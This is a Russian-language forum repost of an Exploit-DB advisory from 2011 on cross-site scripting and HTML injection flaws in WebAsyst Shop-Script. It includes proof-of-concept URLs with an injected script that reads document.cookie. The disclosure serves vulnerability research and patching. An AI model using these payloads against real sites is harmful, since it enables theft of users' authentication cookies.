Exploit WebAsyst Shop-Script - Cross-Site Scripting / HTML Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
35319
Проверка EDB
  1. Пройдено
Автор
HIGH-TECH BRIDGE SA
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2011-02-08
Код:
source: https://www.securityfocus.com/bid/46250/info

WebAsyst Shop-Script is prone to a cross-site-scripting vulnerability and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.


http://www.example.com/html/scripts/index.php?>[xss]

http://www.example.com/SC/html/scripts/index.php?did=22&login=1">[xss]&first_name=2"><script>alert(document.cookie)</script>&custgroupID=0&email=&last_name=&ActState=-1&search=%D0%9D%D0%B0%D0%B9%D1%82%D0%B8&charset=cp1251&count_to_export=
 
Источник
www.exploit-db.com

Похожие темы